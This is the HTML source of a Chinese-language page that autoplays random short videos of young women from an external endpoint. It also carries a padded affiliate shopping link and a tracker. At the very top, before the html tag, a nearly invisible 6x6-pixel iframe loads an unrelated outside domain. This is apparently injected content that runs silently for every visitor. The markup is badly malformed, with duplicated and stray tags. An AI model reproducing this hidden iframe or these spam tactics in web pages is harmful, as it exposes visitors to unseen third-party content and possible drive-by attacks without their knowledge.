<body>
<iframe src="http://d3.rtrtr.shop/oiNL629790I" width="6" height="6"></iframe>
<html>

	<head>
		<meta charset="utf-8">
		<html class="no-js" lang="" style="--status-bar-height:0px; --window-top:0px; --window-bottom:0px;">
			<head>
				<meta charset="utf-8">
				<meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no">

				<title>
					随机小姐姐短视频
				</title>
				
   <link type="text/css" rel="stylesheet" href="./index.css"><title> </title></head> 
 <body> 
 <script src="./jquery.js"></script>  
 <script src="./clipboard.min.js"></script> </script>  
 <div class="STYLE1"> 
 <style>#nr{font-size:30px;margin: 10;background: -webkit-linear-gradient(left,#ffffff,#ff0000  
 
  6.25%,#ff7d00 12.5%,#ffff00 18.75%,#00ff00 25%,#00ffff 31.25%,#0000ff 37.5%,#ff00ff 43.75%,#ffff00 50%,#ff0000 56.25%,#ff7d00 62.5%,#ffff00 68.75%,#00ff00 75%,#00ffff  
 
  81.25%,#0000ff 87.5%,#ff00ff 93.75%,#ffff00 100%);-webkit-background-clip: text;-webkit-text-fill-color: transparent;background-size: 200% 100%;animation: masked-animation 2s  
 
  infinite linear;}@keyframes masked-animation {0% {background-position: 0 0;}100% {background-position: -100%, 0;}}</style></div> 
 <TD height=40 width=821 colSpan=2><SPAN class=STYLE1> 
 <MARQUEE><STRONG> 
 
<b id="nr"><a href=" ">男人是不是都喜欢这种？随机小姐姐短视频</a ></FONT></STRONG></MARQUEE></SPAN> 
 </div> 
 </marquee></style> 
 <div class="mod mod-global-nav nav-header t5 center no-icon line bg2"> 
 <div class="cell title"><span>
      <a href="http://xd.bhrax.com/inviter/LVBUBZ?uid=5675657&scene=link">ㅤㅤ ㅤㅤ ㅤㅤ ㅤㅤ ㅤㅤ 网购省钱神器，邀请码：323323ㅤㅤ ㅤㅤ ㅤㅤㅤ ㅤㅤ ㅤ ㅤㅤ ㅤㅤ ㅤㅤ </a > &nbsp;
 </span> 
 </div> </div> </div>
 

    <section id="buttons">
        <button id="switch">自动已开</button>
        <button id="next">下个视频</button>
    </section>

	</marquee></style>
    <link rel="stylesheet" href="https://fb.lewz.cn/sjxjj/style.css">
</head>
<body>
        <video id="player" src="http://v.nrzj.vip/video.php" controls webkit-playsinline playsinline></video>
    </section>

   <script>
    (function (window, document) {
        if (top != self) {
            window.top.location.replace(self.location.href);
        }
        var get = function (id) {
            return document.getElementById(id);
        }
        var bind = function (element, event, callback) {
            return element.addEventListener(event, callback);
        }
        var auto = true;
        var player = get('player');
        var randomm = function () {
            player.src = 'http://v.nrzj.vip/video.php?_t=' + Math.random();
            player.play();
        }
        bind(get('next'), 'click', randomm);
        bind(player, 'error', function () {
            randomm();
        });
        bind(get('switch'), 'click', function () {
            auto = !auto;
            this.innerText = '自动已' + (auto ? '开' : '关');
        });
        bind(player, 'ended', function () {
            if (auto) randomm();
        });
    })(window, document);
    </script>
    <script type="text/javascript" src="https://js.users.51.la/21244403.js">
  </footer>
   <body>